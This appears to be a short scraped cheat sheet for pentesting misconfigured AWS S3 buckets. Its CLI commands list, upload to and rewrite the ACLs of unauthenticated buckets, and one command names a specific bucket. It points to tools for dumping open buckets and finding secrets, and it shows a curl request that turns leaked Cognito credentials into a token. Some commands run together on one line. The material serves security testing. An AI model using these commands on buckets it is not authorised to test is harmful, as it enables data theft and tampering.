- cloud_metadata.txt, Cloud Metadata Dictionary useful for SSRF Testing
Target example: http://[name_of_bucket].s3.amazonaws.com
Read Permission
aws s3 ls s3://[name_of_bucket] --no-sign-requestaws s3 ls s3://pyx-pkgs --recursive --human-readable --summarize
Write Permission
aws s3 cp localfile s3://[name_of_bucket]/test_file.txt –-no-sign-request
READ_ACP
aws s3api get-bucket-acl --bucket [bucketname] --no-signaws s3api get-object-acl --bucket [bucketname] --key index.html --no-sign-request
WRITE_ACP
aws s3api put-bucket-acl --bucket [bucketname] [ACLPERMISSIONS] --no-sign-requestaws s3api put-object-acl --bucket [bucketname] --key file.txt [ACLPERMISSIONS] --no-sign-request
Tools
- Anonymous Cloud
- AWS CLI
- S3Scanner A tool to find open S3 buckets and dump their contents
- Cloud - AWS Pentest
- s3enum
- To find secrets, you can use trufflehog.
Resources
If you've found aws cognito client id and secret
clientID:clientSercret=>base64KEYcurl -X POST 'https://xx.amazoncognito.com/oauth2/token' \ -H 'Authorization: Basic base64KEY'\ -H 'Content-Type: application/x-www-form-urlencoded' \ -d 'grant_type=client_credentials'- Source
Tools
Resources